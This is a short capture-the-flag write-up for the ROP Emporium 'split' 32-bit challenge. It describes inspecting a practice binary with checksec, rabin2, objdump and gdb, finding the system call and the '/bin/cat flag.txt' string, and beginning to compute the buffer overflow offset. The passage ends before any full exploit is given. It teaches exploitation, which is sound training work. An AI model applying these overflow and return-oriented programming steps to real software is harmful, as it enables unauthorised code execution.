ROP Emporium Split32 (32 Bit) Writeup

3 min readAug 18, 2021

This is the 2nd challenge in ROP Emporium. The challenge is pretty straightforward. We have to call the system() functions with the string “/bin/cat flag.txt” to get our flag. So let’s get started with the challenge.

First I start the challenge by checking the type of file the given binary is.

Next, I check the memory protection in the binary by using “checksec”

Now I had to check the functions present in the binary. I used rabin2 to get the details.

rabin2 -i “binary_name”

We have a system() call in some function which we need to find out. Also, rabin2 and gdb don’t give all the functions in the binary. So I used this tool called objdump. “objdump -D binary_name” gave all the functions. There was a usefulFunction() in the binary which had the system call(). I disassembled this function in gdb.

I saw something was getting pushed before the system() call. I try to find what it was.

So the system() call would just execute whatever that gets pushed before it is called, which here, is /bin/ls. So we need to replace this with “/bin/cat flag.txt”. For this first, we need to search the particular string in GDB.

So we could use this string to replace “/bin/ls”. But how do we do this? Here we don’t call the system@plt directly, instead, we note the base address of the system, which is “0x0804861a”. Using this address, we could also pass the string “/bin/cat flag.txt”. Calling system@plt directly won’t do anything here.

Now we try to find the offset value to overwrite the buffer, padding, and EBP to reach the EIP region. To do this, I used “pattern create” in gdb-peda. Then I used this pattern as input after running the binary inside gdb-peda.